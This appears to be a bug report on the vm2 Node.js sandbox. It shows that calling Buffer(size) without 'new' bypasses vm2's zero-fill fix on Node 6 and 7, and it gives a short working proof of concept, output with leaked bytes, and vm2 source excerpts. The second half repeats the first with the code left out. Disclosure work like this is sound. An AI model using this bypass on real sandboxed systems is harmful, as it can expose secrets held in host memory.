In node.js 6 and 7 (I use node 7.11.0) and [email protected] (recent)
I tested the uninitialized-buffer problem using vm2, and the zero-fill fix can be bypassed with this one line of code:
using `Buffer(size);` instead of `new Buffer(size);`
poc:
// PoC: compare the two ways of creating a Buffer inside the vm2 sandbox on
// node 6/7. Only the `new Buffer(n)` form is covered by vm2's zero-fill shim.
const { VM } = require("vm2");
// Not referenced by the script; presumably kept so a recognisable secret is
// resident in host memory while the sandbox allocates buffers.
const token = 'paSsWord!ASD, totally secret!';
const sandbox = new VM({ timeout: 1000 });

// Call form: the quoted shim sits in the proxy's construct trap, which a
// plain call never reaches, so this buffer is handed back uninitialized.
console.log(`Buffer : ${sandbox.run("Buffer(50);")}`);
// Constructor form: goes through the construct trap and comes back zeroed.
console.log(`new Buffer : ${sandbox.run("new Buffer(50);")}`);
result:
Buffer : P�B�M�;
new Buffer :
// https://github.com/patriksimek/vm2/blob/master/lib/contextify.js#L626
base.construct = (target, args, newTarget) => {
// Fixes buffer unsafe allocation for node v6/7
if (host.version < 8 && fnc === host.Buffer && 'number' === typeof args[0]) {
args[0] = new Array(args[0]).fill(0);
}
- With this code, I think vm2 provides zero-filled buffer initialization on vulnerable versions of node (like 6 and 7)
// https://github.com/patriksimek/vm2/blob/master/lib/contextify.js#L963
// Overlay object for the sandboxed Buffer: replaces allocUnsafe with a call
// to the zero-filling alloc. `this` is the object the sandbox invokes the
// method on, so `this.alloc` is expected to resolve to the proxied host
// Buffer's alloc (host and Contextify are defined outside this excerpt).
// NOTE(review): this covers Buffer.allocUnsafe(size) only; the deprecated
// call form Buffer(size) is not routed through this mock, as the PoC output
// above shows.
const BufferMock = host.Object.create(null);
BufferMock.allocUnsafe = function allocUnsafe(size) {
// Zero-filled allocation in place of the uninitialized one.
return this.alloc(size);
};
// ...
// https://github.com/patriksimek/vm2/blob/master/lib/contextify.js#L979
// Wrap the host Buffer in a read-only proxy with the mock overlay applied,
// then expose that same proxy to sandboxed code as the global Buffer.
const LocalBuffer = Contextify.readonly(host.Buffer, BufferMock);
global.Buffer = LocalBuffer;
-
With this code, I think calling `Buffer()` without `new` can bypass the zero filling: the fix above lives in the `construct` trap, which only runs for `new Buffer(...)`, so a plain `Buffer(...)` call never reaches it.
-
I want to know why `global.Buffer` is left exposed with allocations that are not zero-filled.
In node.js 6,7(I use node 7.11.0) and [email protected] (recent)
I tested uninitialized buffer problem using vm2, and it can be bypassed with this line of code
using `Buffer(size);` instead of `new Buffer(size);`
poc:
result:
With this code, I think the `Buffer()` function can bypass the zero filling.
I want to know why `global.Buffer` is left exposed with allocations that are not zero-filled.